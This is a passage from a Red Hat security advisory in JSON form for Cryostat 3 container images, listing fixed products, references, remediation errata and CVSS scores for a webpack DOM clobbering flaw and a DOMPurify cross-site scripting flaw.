"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T01:12:29+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7706"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-45801",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2024-09-16T19:20:09.863249+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2312631"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in DOMPurify. This issue may allow an attacker to use specially-crafted HTML to bypass the depth checking or use Prototype Pollution to weaken the depth check, which can lead to cross site scripting (XSS) attacks.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "dompurify: XSS vulnerability via prototype pollution",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The vulnerability in DOMPurify, while significant, is categorized as moderate severity rather than important due to its specific conditions for exploitation. The issue requires not only a sophisticated nesting technique to bypass the depth checks but also the ability to leverage Prototype Pollution to weaken these protections. This makes the attack scenario relatively complex and less likely to be encountered in general use cases. Furthermore, the flaw impacts only certain configurations and usage patterns, thus reducing its immediate risk.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45801"
},
{
"category": "external",
"summary": "RHBZ#2312631",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312631"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45801"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45801",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45801"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21",
"url": "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc",
"url": "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674",
"url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674"
}
],
"release_date": "2024-09-16T19:16:11.080000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T01:12:29+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7706"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L",
"version": "3.1"
},
"products": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
